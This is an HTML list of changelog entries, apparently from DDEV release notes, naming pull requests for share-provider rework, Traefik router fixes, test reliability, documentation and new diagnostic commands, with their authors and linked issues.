<li>feat(share): Rework <code>ddev share</code>, add cloudflared share provider, enhance tests, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3579685928" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7784" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7784/hovercard" href="https://github.com/ddev/ddev/issues/7784">#7784</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2435853250" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6441" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6441/hovercard" href="https://github.com/ddev/ddev/issues/6441">#6441</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3595452314" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7802" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7802/hovercard" href="https://github.com/ddev/ddev/pull/7802">#7802</a></li>
<li>docs(codespaces): persist global config on codespaces, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2308791511" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6228" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6228/hovercard" href="https://github.com/ddev/ddev/issues/6228">#6228</a> [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3745175516" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7958" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7958/hovercard" href="https://github.com/ddev/ddev/pull/7958">#7958</a></li>
<li>test(buildkite): Make sure to clean up global traefik dir [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3751522568" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7965" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7965/hovercard" href="https://github.com/ddev/ddev/pull/7965">#7965</a></li>
<li>test(windows): Fix timing bug in TestWindowsInstallerWSL2 polling loop by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3751448862" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7964" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7964/hovercard" href="https://github.com/ddev/ddev/pull/7964">#7964</a></li>
<li>test(share): fix TestShareCmdProviderSystem/ProviderArgsFlag assertion, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3745929213" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7959" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7959/hovercard" href="https://github.com/ddev/ddev/issues/7959">#7959</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3748079866" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7960" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7960/hovercard" href="https://github.com/ddev/ddev/pull/7960">#7960</a></li>
<li>test: Stop using old version of memcached to prevent output about docker-compose version tag [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3754794611" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7973" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7973/hovercard" href="https://github.com/ddev/ddev/pull/7973">#7973</a></li>
<li>fix(platform): Resume environment if not running by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3754724806" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7972" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7972/hovercard" href="https://github.com/ddev/ddev/pull/7972">#7972</a></li>
<li>build(deps): install tzdata-legacy for Debian 13 Trixie by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3754280745" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7971" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7971/hovercard" href="https://github.com/ddev/ddev/pull/7971">#7971</a></li>
<li>fix: show correct project name in <code>ddev mutagen st</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3753387591" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7969" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7969/hovercard" href="https://github.com/ddev/ddev/issues/7969">#7969</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3753474436" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7970" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7970/hovercard" href="https://github.com/ddev/ddev/pull/7970">#7970</a></li>
<li>test(buildkite): Use colima stop -f to force stop [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3758779244" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7977" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7977/hovercard" href="https://github.com/ddev/ddev/pull/7977">#7977</a></li>
<li>docs: add cloudflare warp networking instructions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lguigo22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lguigo22">@lguigo22</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3756979012" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7975" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7975/hovercard" href="https://github.com/ddev/ddev/pull/7975">#7975</a></li>
<li>docs: lima template creation for users [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3765100578" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7985" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7985/hovercard" href="https://github.com/ddev/ddev/pull/7985">#7985</a></li>
<li>docs(developer): Update template syntax for lima in developer docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3765099554" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7984" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7984/hovercard" href="https://github.com/ddev/ddev/pull/7984">#7984</a></li>
<li>test: show ddev version at start of tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3765028533" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7983" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7983/hovercard" href="https://github.com/ddev/ddev/pull/7983">#7983</a></li>
<li>fix(traefik): Convert Traefik configuration errors to warnings instead of failures by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3751597410" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7967" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7967/hovercard" href="https://github.com/ddev/ddev/pull/7967">#7967</a></li>
<li>fix(test): Force TestDownloadFileRetryLogic to work even if DDEV_DEBUG wasn't set [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3765149784" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7986" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7986/hovercard" href="https://github.com/ddev/ddev/pull/7986">#7986</a></li>
<li>refactor: systematize #ddev-generated signature checking by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3764929539" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7982" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7982/hovercard" href="https://github.com/ddev/ddev/pull/7982">#7982</a></li>
<li>feat: Add <code>ddev utility mutagen-diagnose</code> command for Mutagen troubleshooting, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3538536243" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7740" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7740/hovercard" href="https://github.com/ddev/ddev/issues/7740">#7740</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3765952291" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7988" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7988/hovercard" href="https://github.com/ddev/ddev/pull/7988">#7988</a></li>
<li>fix(router): Improve Traefik healthcheck for better router verification by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3764922813" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7981" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7981/hovercard" href="https://github.com/ddev/ddev/pull/7981">#7981</a></li>
<li>test(buildkite): Clean up lima and colima containers at start by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3782674572" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8006" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8006/hovercard" href="https://github.com/ddev/ddev/pull/8006">#8006</a></li>
<li>test(github): Allow skipping github tests with [skip github] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3783024777" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8007" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8007/hovercard" href="https://github.com/ddev/ddev/pull/8007">#8007</a></li>
<li>fix(router): Prevent unnecessary router re-creation when bound ports unchanged, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2644155987" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6703" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6703/hovercard" href="https://github.com/ddev/ddev/issues/6703">#6703</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3770381899" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7992" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7992/hovercard" href="https://github.com/ddev/ddev/pull/7992">#7992</a></li>
<li>fix(composer): warn that global and self-update changes don't persist, use <code>stable</code> for empty <code>composer_version</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3772425983" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7993" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7993/hovercard" href="https://github.com/ddev/ddev/issues/7993">#7993</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3772755620" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7995" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7995/hovercard" href="https://github.com/ddev/ddev/pull/7995">#7995</a></li>
<li>feat: add <code>--no-cache</code> flag for <code>ddev start</code> and <code>ddev restart</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3776267513" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7999" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7999/hovercard" href="https://github.com/ddev/ddev/pull/7999">#7999</a></li>
<li>fix(router): healthcheck after new config must happen as normal user by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3789985132" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8010" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8010/hovercard" href="https://github.com/ddev/ddev/pull/8010">#8010</a></li>
<li>test(traefik): improve reliability of traefik.bats router API tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3794407933" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8013" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8013/hovercard" href="https://github.com/ddev/ddev/pull/8013">#8013</a></li>
<li>docs: separate CLAUDE.md from AGENTS.md with focused content by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shaal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shaal">@shaal</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3793577139" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8011" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8011/hovercard" href="https://github.com/ddev/ddev/pull/8011">#8011</a></li>
<li>feat: include additional ssh config files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codebymikey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codebymikey">@codebymikey</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3789513134" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8008" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8008/hovercard" href="https://github.com/ddev/ddev/pull/8008">#8008</a></li>
<li>fix(tests): make GitHub release downloads more resilient [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3797908891" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8015" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8015/hovercard" href="https://github.com/ddev/ddev/pull/8015">#8015</a></li>
<li>chore(codespaces): Use newer test project for codespaces, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3801291888" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8017" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8017/hovercard" href="https://github.com/ddev/ddev/issues/8017">#8017</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3806578177" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8022" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8022/hovercard" href="https://github.com/ddev/ddev/pull/8022">#8022</a></li>
<li>docs: Update Ibexa DXP install by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adriendupuis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adriendupuis">@adriendupuis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3805274672" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8021" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8021/hovercard" href="https://github.com/ddev/ddev/pull/8021">#8021</a></li>
<li>test: Disable long-running tests when GOTEST_SHORT is set, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3814257730" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8026" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8026/hovercard" href="https://github.com/ddev/ddev/issues/8026">#8026</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3814695320" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8028" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8028/hovercard" href="https://github.com/ddev/ddev/pull/8028">#8028</a></li>
<li>build(docker-compose): Bump docker-compose to v5.0.1 before release by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3814852853" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8031" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8031/hovercard" href="https://github.com/ddev/ddev/pull/8031">#8031</a></li>
<li>test(docker): Add Docker CE container cleanup for WSL instances, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3814823179" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8029" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8029/hovercard" href="https://github.com/ddev/ddev/issues/8029">#8029</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3814825356" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8030" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8030/hovercard" href="https://github.com/ddev/ddev/pull/8030">#8030</a></li>
<li>fix: prevent panic during <code>ddev poweroff</code> or use of container.Names[0], fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3811380435" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8024" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8024/hovercard" href="https://github.com/ddev/ddev/issues/8024">#8024</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3814633137" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8027" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8027/hovercard" href="https://github.com/ddev/ddev/pull/8027">#8027</a></li>
<li>docs(xdebug): Add step-debugging.md endpoint security notes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelpittet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelpittet">@joelpittet</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3777521549" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8002" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8002/hovercard" href="https://github.com/ddev/ddev/pull/8002">#8002</a></li>
<li>feat(codeigniter): add CodeIgniter 4 app type, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3068326488" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7303" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7303/hovercard" href="https://github.com/ddev/ddev/issues/7303">#7303</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Franky5831/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Franky5831">@Franky5831</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3622910076" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7853" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7853/hovercard" href="https://github.com/ddev/ddev/pull/7853">#7853</a></li>
<li>fix(composer): run post-create-project-cmd for plugin events by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3819196336" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8039" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8039/hovercard" href="https://github.com/ddev/ddev/pull/8039">#8039</a></li>
<li>fix: sort web_extra_exposed_ports for router port matching in generic webserver, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3434139793" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7640" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7640/hovercard" href="https://github.com/ddev/ddev/issues/7640">#7640</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3822882288" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8040" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8040/hovercard" href="https://github.com/ddev/ddev/pull/8040">#8040</a></li>
<li>feat(xdebug-diagnose): Add <code>ddev utility xdebug-diagnose</code> command with interactive mode and WSL2 support by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3778517084" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8004" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8004/hovercard" href="https://github.com/ddev/ddev/pull/8004">#8004</a></li>
<li>fix: exclude paused/stopped projects from router's Traefik configuration by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3748548051" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7961" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7961/hovercard" href="https://github.com/ddev/ddev/pull/7961">#7961</a></li>
<li>test(quickstart): fix TYPO3 v14 test [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3834544982" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8044" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8044/hovercard" href="https://github.com/ddev/ddev/pull/8044">#8044</a></li>
<li>fix(pause): resolve race condition in app.Pause() causing intermittent test failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3834117681" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8043" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8043/hovercard" href="https://github.com/ddev/ddev/pull/8043">#8043</a></li>
<li>feat(devcontainer): Add more explicit support for non-codespaces devcontainer, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3063729923" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7294" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7294/hovercard" href="https://github.com/ddev/ddev/issues/7294">#7294</a>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3634176464" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7876" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7876/hovercard" href="https://github.com/ddev/ddev/issues/7876">#7876</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3801324251" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8018" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8018/hovercard" href="https://github.com/ddev/ddev/issues/8018">#8018</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3815143833" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8032" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8032/hovercard" href="https://github.com/ddev/ddev/pull/8032">#8032</a></li>
<li>fix: pull all app images at once, initialize XHGui ports and mode if empty, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3811346250" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8023" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8023/hovercard" href="https://github.com/ddev/ddev/issues/8023">#8023</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3838723636" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8046" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8046/hovercard" href="https://github.com/ddev/ddev/pull/8046">#8046</a></li>
<li>fix(webserver): better log-stderr.sh reporting, remove trixie-backports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3833225571" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8042" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8042/hovercard" href="https://github.com/ddev/ddev/pull/8042">#8042</a></li>
